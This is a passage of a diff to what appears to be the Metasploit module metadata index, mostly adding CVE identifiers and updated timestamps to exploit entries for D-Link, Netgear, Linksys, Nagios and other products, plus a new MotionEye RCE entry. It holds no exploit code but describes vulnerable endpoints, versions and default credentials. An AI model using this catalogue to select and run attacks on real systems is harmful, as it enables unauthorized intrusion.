+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/centreon_pollers_auth_rce": {
    "name": "Centreon Poller Authenticated Remote Command Execution",
    "fullname": "exploit/linux/http/centreon_pollers_auth_rce",
@@ -71195,6 +71652,7 @@
    ],
    "description": "This module exploits a SQL injection and command injection vulnerability in the PHP version of CryptoLog.\n          An unauthenticated user can execute a terminal command under the context of the web user. These vulnerabilities\n          are no longer present in the ASP.NET version CryptoLog, available since 2009.\n\n          CryptoLog's login.php endpoint is responsible for the login process. One of the user supplied parameters is\n          used by the application without input validation and parameter binding, which leads to SQL injection\n          vulnerability. Successfully exploiting this vulnerability gives a valid session.\n\n          CryptoLog's logshares_ajax.php endpoint is responsible for executing an operation system command. It's not\n          possible to access this endpoint without having a valid session. One user parameter is used by the\n          application while executing an operating system command, which causes a command injection issue.\n\n          Combining these vulnerabilities gives the opportunity execute operation system commands under the context\n          of the web user.",
    "references": [
+      "CVE-2025-34102",
      "URL-https://pentest.blog/advisory-cryptolog-unauthenticated-remote-code-execution/"
    ],
    "platform": "Python",
@@ -71218,7 +71676,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/crypttech_cryptolog_login_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/crypttech_cryptolog_login_exec",
@@ -71326,6 +71784,7 @@
    ],
    "description": "Utilizing the DCOS Cluster's Marathon UI, an attacker can create\n          a docker container with the '/' path mounted with read/write\n          permissions on the host server that is running the docker container.\n          As the docker container executes command as uid 0 it is honored\n          by the host operating system allowing the attacker to edit/create\n          files owed by root. This exploit abuses this to creates a cron job\n          in the '/etc/cron.d/' path of the host server.\n\n          *Notes: The docker image must be a valid docker image from\n          hub.docker.com. Furthermore the docker container will only\n          deploy if there are resources available in the DC/OS cluster.",
    "references": [
+      "CVE-2017-20198",
      "URL-https://warroom.securestate.com/dcos-marathon-compromise/"
    ],
    "platform": "",
@@ -71349,7 +71808,7 @@
    "targets": [
      "Python"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/dcos_marathon.rb",
    "is_install_path": true,
    "ref_name": "linux/http/dcos_marathon",
@@ -71502,6 +71961,7 @@
    ],
    "description": "This module exploits a remote buffer overflow vulnerability on several D-Link routers.\n          The vulnerability exists in the handling of HTTP queries to the authentication.cgi with\n          long password values. The vulnerability can be exploitable without authentication. This\n          module has been tested successfully on D-Link firmware DIR645A1_FW103B11. Other firmwares\n          such as the DIR865LA1_FW101b06 and DIR845LA1_FW100b20 are also vulnerable.",
    "references": [
+      "CVE-2013-7389",
      "OSVDB-95951",
      "EDB-27283",
      "URL-http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008",
@@ -71529,7 +71989,7 @@
    "targets": [
      "D-Link DIR-645 1.03"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb",
    "is_install_path": true,
    "ref_name": "linux/http/dlink_authentication_cgi_bof",
@@ -71563,6 +72023,7 @@
    ],
    "description": "Various D-Link Routers are vulnerable to OS command injection via the web\n          interface. The vulnerability exists in command.php, which is accessible without\n          authentication. This module has been tested with the versions DIR-600 2.14b01,\n          DIR-300 rev B 2.13.",
    "references": [
+      "CVE-2013-10048",
      "OSVDB-89861",
      "EDB-24453",
      "BID-57734",
@@ -71591,7 +72052,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb",
    "is_install_path": true,
    "ref_name": "linux/http/dlink_command_php_exec_noauth",
@@ -71684,7 +72145,9 @@
      "Nicholas Starke <nick@alephvoid.com>"
    ],
    "description": "The D-Link DCS-930L Network Video Camera is vulnerable\n          to OS Command Injection via the web interface.  The vulnerability\n          exists at /setSystemCommand, which is accessible with credentials.\n          This vulnerability was present in firmware version 2.01 and fixed\n          by 2.12.",
-    "references": [],
+    "references": [
+      "CVE-2016-11021"
+    ],
    "platform": "Unix",
    "arch": "cmd",
    "rport": 80,
@@ -71708,7 +72171,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb",
    "is_install_path": true,
    "ref_name": "linux/http/dlink_dcs_930l_authenticated_remote_command_execution",
@@ -71804,6 +72267,7 @@
    ],
    "description": "Various D-Link Routers are vulnerable to OS command injection via the web\n          interface. The vulnerability exists in tools_vct.xgi, which is accessible with\n          credentials. According to the vulnerability discoverer, more D-Link devices may\n          be affected.",
    "references": [
+      "CVE-2013-10050",
      "OSVDB-92698",
      "EDB-25024",
      "BID-59405",
@@ -71830,7 +72294,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb",
    "is_install_path": true,
    "ref_name": "linux/http/dlink_dir300_exec_telnet",
@@ -71864,6 +72328,7 @@
    ],
    "description": "This module exploits an anonymous remote code execution vulnerability on D-Link DIR-605L routers. The\n          vulnerability exists while handling user supplied captcha information, and is due to the\n          insecure usage of sprintf on the getAuthCode() function. This module has been tested\n          successfully on D-Link DIR-605L firmware 1.13 (emulated) and firmware 1.12 (real).",
    "references": [
+      "CVE-2012-10021",
      "OSVDB-86824",
      "URL-http://www.devttys0.com/2012/10/exploiting-a-mips-stack-overflow/"
    ],
@@ -71888,7 +72353,7 @@
    "targets": [
      "D-Link DIR-605L 1.13"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb",
    "is_install_path": true,
    "ref_name": "linux/http/dlink_dir605l_captcha_bof",
@@ -71922,6 +72387,7 @@
    ],
    "description": "Some D-Link Routers are vulnerable to an authenticated OS command injection on\n          their web interface, where default credentials are admin/admin or admin/password.\n          Since it is a blind os command injection vulnerability, there is no output for the\n          executed command when using the cmd generic payload. This module was tested against\n          a DIR-615 hardware revision H1 - firmware version 8.04. A ping command against a\n          controlled system could be used for testing purposes. The exploit uses the wget\n          client from the device to convert the command injection into an arbitrary payload\n          execution.",
    "references": [
+      "CVE-2013-10059",
      "BID-57882",
      "EDB-24477",
      "OSVDB-90174",
@@ -71949,7 +72415,7 @@
      "CMD",
      "Linux mipsel Payload"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/dlink_dir615_up_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/dlink_dir615_up_exec",
@@ -71983,6 +72449,7 @@
    ],
    "description": "This module leverages an unauthenticated credential disclosure\n          vulnerability to then execute arbitrary commands on DIR-850L routers\n          as an authenticated user. Unable to use Meterpreter payloads.",
    "references": [
+      "CVE-2019-17508",
      "URL-https://www.seebug.org/vuldb/ssvid-96333",
      "URL-https://blogs.securiteam.com/index.php/archives/3310"
    ],
@@ -72007,7 +72474,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/dlink_dir850l_unauth_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/dlink_dir850l_unauth_exec",
@@ -72041,6 +72508,7 @@
    ],
    "description": "This module exploits a remote command injection vulnerability in D-Link DSL-2750B devices.\n          Vulnerability can be exploited through \"cli\" parameter that is directly used to invoke\n          \"ayecli\" binary. Vulnerable firmwares are from 1.01 up to 1.03.",
    "references": [
+      "CVE-2016-20017",
      "PACKETSTORM-135706",
      "URL-https://seclists.org/fulldisclosure/2016/Feb/53",
      "URL-http://www.quantumleap.it/d-link-router-dsl-2750b-firmware-1-01-1-03-rce-no-auth/"
@@ -72067,7 +72535,7 @@
      "Linux mipsbe Payload",
      "Linux mipsel Payload"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/dlink_dsl2750b_exec_noauth.rb",
    "is_install_path": true,
    "ref_name": "linux/http/dlink_dsl2750b_exec_noauth",
@@ -72101,6 +72569,7 @@
    ],
    "description": "This module exploits an anonymous remote upload and code execution vulnerability on different\n          D-Link devices. The vulnerability is a command injection in the cookie handling process of the\n          lighttpd web server when handling specially crafted cookie values. This module has been\n          successfully tested on D-Link DSP-W110A1_FW105B01 in emulated environment.",
    "references": [
+      "CVE-2025-34125",
      "URL-http://web.archive.org/web/20160125171424/https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110"
    ],
    "platform": "Linux",
@@ -72125,7 +72594,7 @@
      "MIPS Little Endian",
      "MIPS Big Endian"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/dlink_dspw110_cookie_noauth_exec",
@@ -72159,6 +72628,7 @@
    ],
    "description": "This module exploits an anonymous remote code execution vulnerability on different D-Link\n          devices. The vulnerability is a stack based buffer overflow in the my_cgi.cgi component,\n          when handling specially crafted POST HTTP requests addresses to the /common/info.cgi\n          handler. This module has been successfully tested on D-Link DSP-W215 in an emulated\n          environment.",
    "references": [
+      "CVE-2014-125117",
      "OSVDB-108249",
      "URL-http://www.devttys0.com/2014/05/hacking-the-dspw215-again/"
    ],
@@ -72184,7 +72654,7 @@
      "Automatic Targeting",
      "D-Link DSP-W215 - v1.02"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb",
    "is_install_path": true,
    "ref_name": "linux/http/dlink_dspw215_info_cgi_bof",
@@ -72279,6 +72749,7 @@
    ],
    "description": "This module exploits an anonymous remote code execution vulnerability on several D-Link\n          routers. The vulnerability exists in the handling of HTTP queries to the hedwig.cgi with\n          long value cookies. This module has been tested successfully on D-Link DIR300v2.14, DIR600\n          and the DIR645A1_FW103B11 firmware.",
    "references": [
+      "CVE-2013-7389",
      "OSVDB-95950",
      "EDB-27283",
      "URL-http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008",
@@ -72306,7 +72777,7 @@
    "targets": [
      "Multiple Targets: D-Link DIR-645 v1.03, DIR-300 v2.14, DIR-600"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb",
    "is_install_path": true,
    "ref_name": "linux/http/dlink_hedwig_cgi_bof",
@@ -72404,6 +72875,7 @@
    ],
    "description": "Different D-Link Routers are vulnerable to OS command injection in the HNAP SOAP\n          interface. Since it is a blind OS command injection vulnerability, there is no\n          output for the executed command. This module has been tested on a DIR-645 device.\n          The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB,\n          DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB,\n          DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR",
    "references": [
+      "CVE-2015-2051",
      "URL-http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051",
      "URL-http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/"
    ],
@@ -72429,7 +72901,7 @@
      "MIPS Little Endian",
      "MIPS Big Endian"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb",
    "is_install_path": true,
    "ref_name": "linux/http/dlink_hnap_header_exec_noauth",
@@ -72702,6 +73174,7 @@
    ],
    "description": "This module exploits a vulnerability found in Dolibarr ERP/CRM 3's\n          backup feature.  This software is used to manage a company's business\n          information such as contacts, invoices, orders, stocks, agenda, etc.\n          When processing a database backup request, the export.php function\n          does not check the input given to the sql_compat parameter, which allows\n          a remote authenticated attacker to inject system commands into it,\n          and then gain arbitrary code execution.",
    "references": [
+      "CVE-2012-10059",
      "OSVDB-80980",
      "URL-https://seclists.org/fulldisclosure/2012/Apr/78"
    ],
@@ -72726,7 +73199,7 @@
    "targets": [
      "Dolibarr 3.1.1 on Linux"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/dolibarr_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/dolibarr_cmd_exec",
@@ -73122,6 +73595,7 @@
    ],
    "description": "This module exploits a command injection vulnerability found in E-Mail Security\n          Virtual Appliance. This module abuses the learn-msg.cgi file to execute arbitrary\n          OS commands without authentication. This module has been successfully tested on the\n          ESVA_2057 appliance.",
    "references": [
+      "CVE-2012-10046",
      "OSVDB-85462",
      "BID-55050",
      "EDB-20551"
@@ -73147,7 +73621,7 @@
    "targets": [
      "ESVA_2057"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/esva_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/esva_exec",
@@ -74286,6 +74760,7 @@
    ],
    "description": "This module exploits two security issues in Github Enterprise, version 2.8.0 - 2.8.6.\n          The first is that the session management uses a hard-coded secret value, which can be\n          abused to sign a serialized malicious Ruby object. The second problem is due to the\n          use of unsafe deserialization, which allows the malicious Ruby object to be loaded,\n          and results in arbitrary remote code execution.\n\n          This exploit was tested against version 2.8.0.",
    "references": [
+      "CVE-2017-18365",
      "EDB-41616",
      "URL-http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html",
      "URL-https://enterprise.github.com/releases/2.8.7/notes"
@@ -74311,7 +74786,7 @@
    "targets": [
      "Github Enterprise 2.8"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/github_enterprise_secret.rb",
    "is_install_path": true,
    "ref_name": "linux/http/github_enterprise_secret",
@@ -74967,6 +75442,7 @@
    ],
    "description": "The H2 database contains an alias function which allows for arbitrary Java code to be used.\n          This functionality can be abused to create an exec functionality to pull our payload down\n          and execute it. H2's web interface contains restricts MANY characters, so injecting a payload\n          directly is not favorable. A valid database connection is required. If the database engine\n          was configured to allow creation of databases, the module default can be used which\n          utilizes an in memory database. Some Docker instances of H2 don't allow writing to\n          folders such as /tmp, so we default to writing to the working directory of the software.\n\n          This module was tested against H2 version 2.1.214, 2.0.204, 1.4.199 (version detection fails)",
    "references": [
+      "CVE-2018-10054",
      "EDB-44422",
      "EDB-45506",
      "URL-https://medium.com/r3d-buck3t/chaining-h2-database-vulnerabilities-for-rce-9b535a9621a2",
@@ -74993,7 +75469,7 @@
    "targets": [
      "Automatic Target"
    ],
-    "mod_time": "2023-08-08 15:28:34 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/h2_webinterface_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/http/h2_webinterface_rce",
@@ -75505,6 +75981,7 @@
    ],
    "description": "This module exploits a command injection vulnerability in Imperva\n          SecureSphere 13.x. The vulnerability exists in the PWS service,\n          where Python CGIs didn't properly sanitize user supplied command\n          parameters and directly passes them to corresponding CLI utility,\n          leading to command injection. Agent registration credential is\n          required to exploit SecureSphere in gateway mode.\n\n          This module was successfully tested on Imperva SecureSphere 13.0/13.1/\n          13.2 in pre-ftl mode and unsealed gateway mode.",
    "references": [
+      "CVE-2018-16660",
      "EDB-45542"
    ],
    "platform": "Linux",
@@ -75528,7 +76005,7 @@
    "targets": [
      "Imperva SecureSphere 13.0/13.1/13.2"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/imperva_securesphere_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/imperva_securesphere_exec",
@@ -75921,6 +76398,7 @@
    ],
    "description": "IPFire, a free linux based open source firewall distribution,\n          version < 2.19 Update Core 101 contains a remote command execution\n          vulnerability in the proxy.cgi page.",
    "references": [
+      "CVE-2025-34116",
      "EDB-39765",
      "URL-https://www.ipfire.org/news/ipfire-2-19-core-update-101-released"
    ],
@@ -75945,7 +76423,7 @@
    "targets": [
      "Automatic Target"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/ipfire_proxy_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/ipfire_proxy_exec",
@@ -76648,6 +77126,7 @@
    ],
    "description": "This module exploits an Object Injection vulnerability in Kaltura.\n          By exploiting this vulnerability, unauthenticated users can execute\n          arbitrary code under the context of the web server user.\n\n          Kaltura has a module named keditorservices that takes user input\n          and then uses it as an unserialized function parameter. The constructed\n          object is based on the SektionEins Zend code execution POP chain PoC,\n          with a minor modification to ensure Kaltura processes it and the\n          Zend_Log function's __destruct() method is called. Kaltura versions\n          prior to 11.1.0-2 are affected by this issue.\n\n          This module was tested against Kaltura 11.1.0 installed on CentOS 6.8.",
    "references": [
+      "CVE-2016-15044",
      "EDB-39563"
    ],
    "platform": "PHP",
@@ -76671,7 +77150,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/kaltura_unserialize_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/http/kaltura_unserialize_rce",
@@ -76765,6 +77244,7 @@
    ],
    "description": "Kibana before version 7.6.3 suffers from a prototype pollution bug within the\n          Upgrade Assistant. By setting a new constructor.prototype.sourceURL value we're\n          able to execute arbitrary code.\n          Code execution is possible through two different ways. Either by sending data\n          directly to Elastic, or using Kibana to submit the same queries. Either method\n          enters the polluted prototype for Kibana to read.\n\n          Kibana will either need to be restarted, or collection happens (unknown time) for\n          the payload to execute. Once it does, cleanup must delete the .kibana_1 index\n          for Kibana to restart successfully. Once a callback does occur, cleanup will\n          happen allowing Kibana to be successfully restarted on next attempt.",
    "references": [
+      "CVE-2020-7012",
      "URL-https://hackerone.com/reports/852613"
    ],
    "platform": "Linux",
@@ -76789,7 +77269,7 @@
      "ELASTIC",
      "KIBANA"
    ],
-    "mod_time": "2023-10-06 09:55:10 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/kibana_upgrade_assistant_telemetry_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/http/kibana_upgrade_assistant_telemetry_rce",
@@ -76889,6 +77369,7 @@
    ],
    "description": "This module exploits an unauthenticated SQL injection vulnerability affecting Kloxo, as\n          exploited in the wild on January 2014. The SQL injection issue can be abused in order to\n          retrieve the Kloxo admin cleartext password from the database. With admin access to the\n          web control panel, remote PHP code execution can be achieved by abusing the Command Center\n          function. The module tries to find the first server in the tree view, unless the server\n          information is provided, in which case it executes the payload there.",
    "references": [
+      "CVE-2014-125123",
      "URL-https://vpsboard.com/topic/3384-kloxo-installations-compromised/",
      "URL-http://www.webhostingtalk.com/showthread.php?p=8996984",
      "URL-http://forum.lxcenter.org/index.php?t=msg&th=19215&goto=102646"
@@ -76914,7 +77395,7 @@
    "targets": [
      "Kloxo / CentOS"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/kloxo_sqli.rb",
    "is_install_path": true,
    "ref_name": "linux/http/kloxo_sqli",
@@ -77368,6 +77849,7 @@
    ],
    "description": "Some Linksys Routers are vulnerable to an authenticated OS command injection.\n          Default credentials for the web interface are admin/admin or admin/password. Since\n          it is a blind os command injection vulnerability, there is no output for the\n          executed command when using the cmd generic payload. A ping command against a\n          controlled system could be used for testing purposes.",
    "references": [
+      "CVE-2018-3953",
      "BID-57760",
      "EDB-24475",
      "OSVDB-89912",
@@ -77395,7 +77877,7 @@
      "CMD",
      "Linux mipsel Payload"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/linksys_e1500_apply_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/linksys_e1500_apply_exec",
@@ -77432,6 +77914,7 @@
    ],
    "description": "Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command\n          injection. This vulnerability was used from the so-called \"TheMoon\" worm. There\n          are many Linksys systems that are potentially vulnerable, including E4200, E3200, E3000,\n          E2500, E2100L, E2000, E1550, E1500, E1200, E1000, and E900. This module was tested\n          successfully against an E1500 v1.0.5.",
    "references": [
+      "CVE-2025-34037",
      "EDB-31683",
      "BID-65585",
      "OSVDB-103321",
@@ -77462,7 +77945,7 @@
      "Linux mipsel Payload",
      "Linux mipsbe Payload"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/linksys_themoon_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/linksys_themoon_exec",
@@ -77556,6 +78039,7 @@
    ],
    "description": "Some Linksys Routers are vulnerable to an authenticated OS command injection on\n          their web interface where default credentials are admin/admin or admin/password.\n          Since it is a blind OS command injection vulnerability, there is no output for the\n          executed command when using the cmd generic payload. This module has been tested on\n          a Linksys WRT160n version 2 - firmware version v2.0.03. A ping command against a\n          controlled system could be used for testing purposes. The exploit uses the tftp\n          client from the device to stage to native payloads from the command injection.",
    "references": [
+      "CVE-2013-10058",
      "BID-57887",
      "EDB-24478",
      "OSVDB-90093",
@@ -77583,7 +78067,7 @@
      "CMD",
      "Linux mipsel Payload"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/linksys_wrt160nv2_apply_exec",
@@ -77800,6 +78284,7 @@
    ],
    "description": "This module exploits a command injection vulnerability in Logsign.\n          By exploiting this vulnerability, unauthenticated users can execute\n          arbitrary code under the root user.\n\n          Logsign has a publicly accessible endpoint. That endpoint takes a user\n          input and then use it during operating system command execution without\n          proper validation.\n\n          This module was tested against 4.4.2 and 4.4.137 versions.",
    "references": [
+      "CVE-2024-5721",
      "URL-https://pentest.blog/unexpected-journey-3-visiting-another-siem-and-uncovering-pre-auth-privileged-remote-code-execution/"
    ],
    "platform": "Python",
@@ -77823,7 +78308,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/logsign_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/logsign_exec",
@@ -78587,6 +79072,65 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/motioneye_auth_rce_cve_2025_60787": {
+    "name": "Remote Code Execution Vulnerability in MotionEye Frontend (CVE-2025-60787)",
+    "fullname": "exploit/linux/http/motioneye_auth_rce_cve_2025_60787",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-09-09",
+    "type": "exploit",
+    "author": [
+      "Maksim Rogov",
+      "prabhatverma47"
+    ],
+    "description": "This module exploits a template injection vulnerability in the MotionEye Frontend.\n\n          MotionEye Frontend versions 0.43.1b4 and prior are vulnerable to OS Command Injection in configuration parameters such as image_file_name.\n          Unsanitized user input is written to MotionEye Frontend configuration files, allowing remote authenticated attackers with admin access to achieve code execution.\n\n          Successful exploitation will result in the command executing as the user running\n          the web server, potentially exposing sensitive data or disrupting survey operations.\n\n          An attacker can execute arbitrary system commands in the context of the user running the web server.",
+    "references": [
+      "CVE-2025-60787",
+      "URL-https://github.com/prabhatverma47/motionEye-RCE-through-config-parameter"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command"
+    ],
+    "mod_time": "2025-10-09 21:51:31 +0000",
+    "path": "/modules/exploits/linux/http/motioneye_auth_rce_cve_2025_60787.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/motioneye_auth_rce_cve_2025_60787",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/multi_ncc_ping_exec": {
    "name": "D-Link/TRENDnet NCC Service Command Injection",
    "fullname": "exploit/linux/http/multi_ncc_ping_exec",
@@ -78723,6 +79267,7 @@
    ],
    "description": "This module exploits an unauthenticated remote command execution\n          vulnerability in MVPower digital video recorders. The 'shell' file\n          on the web interface executes arbitrary operating system commands in\n          the query string.\n\n          This module was tested successfully on a MVPower model TV-7104HE with\n          firmware version 1.8.4 115215B9 (Build 2014/11/17).\n\n          The TV-7108HE model is also reportedly affected, but untested.",
    "references": [
+      "CVE-2016-20016",
      "URL-http://web.archive.org/web/20200512230920/https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/",
      "URL-https://www.pentestpartners.com/blog/pwning-cctv-cameras/"
    ],
@@ -78747,7 +79292,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/mvpower_dvr_shell_exec",
@@ -78841,6 +79386,10 @@
    ],
    "description": "This module exploits an SQL injection, auth bypass, file upload,\n          command injection, and privilege escalation in Nagios XI <= 5.2.7\n          to pop a root shell.",
    "references": [
+      "CVE-2018-8733",
+      "CVE-2018-8734",
+      "CVE-2018-8735",
+      "CVE-2018-8736",
      "EDB-39899"
    ],
    "platform": "Unix",
@@ -78864,7 +79413,7 @@
    "targets": [
      "Nagios XI <= 5.2.7"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/nagios_xi_chained_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/http/nagios_xi_chained_rce",
@@ -79391,6 +79940,7 @@
    ],
    "description": "This module exploits an unauthenticated OS command execution vulneralbility\n          in the setup.cgi file in Netgear DGN1000 firmware versions up to 1.1.00.48, and\n          DGN2000v1 models.",
    "references": [
+      "CVE-2024-12847",
      "EDB-25978"
    ],
    "platform": "Linux",
@@ -79414,7 +79964,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/netgear_dgn1000_setup_unauth_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/netgear_dgn1000_setup_unauth_exec",
@@ -79448,6 +79998,7 @@
    ],
    "description": "Some Netgear Routers are vulnerable to authenticated OS Command injection. The\n          vulnerability exists in the web interface, specifically in the setup.cgi component,\n          when handling the TimeToLive parameter. Default credentials are always a good\n          starting point, admin/admin or admin/password could be a first try. Since it is a\n          blind os command injection vulnerability, there is no output for the executed\n          command when using the cmd generic payload. A ping command against a controlled\n          system could be used for testing purposes.",
    "references": [
+      "CVE-2013-10061",
      "BID-57836",
      "EDB-24464",
      "OSVDB-89985",
@@ -79475,7 +80026,7 @@
      "CMD",
      "Linux mipsbe Payload"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/netgear_dgn1000b_setup_exec",
@@ -79509,6 +80060,7 @@
    ],
    "description": "Some Netgear Routers are vulnerable to an authenticated OS command injection\n          on their web interface. Default credentials for the web interface are admin/admin\n          or admin/password. Since it is a blind os command injection vulnerability, there\n          is no output for the executed command when using the cmd generic payload. A ping\n          command against a controlled system could be used for testing purposes. This module\n          overwrites parts of the PPOE configuration, while the module tries to restore it\n          after exploitation configuration backup is recommended.",
    "references": [
+      "CVE-2013-10060",
      "BID-57998",
      "EDB-24513",
      "OSVDB-90320",
@@ -79536,7 +80088,7 @@
      "CMD",
      "Linux mipsbe Payload"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/netgear_dgn2200b_pppoe_exec",
@@ -80283,6 +80835,7 @@
    ],
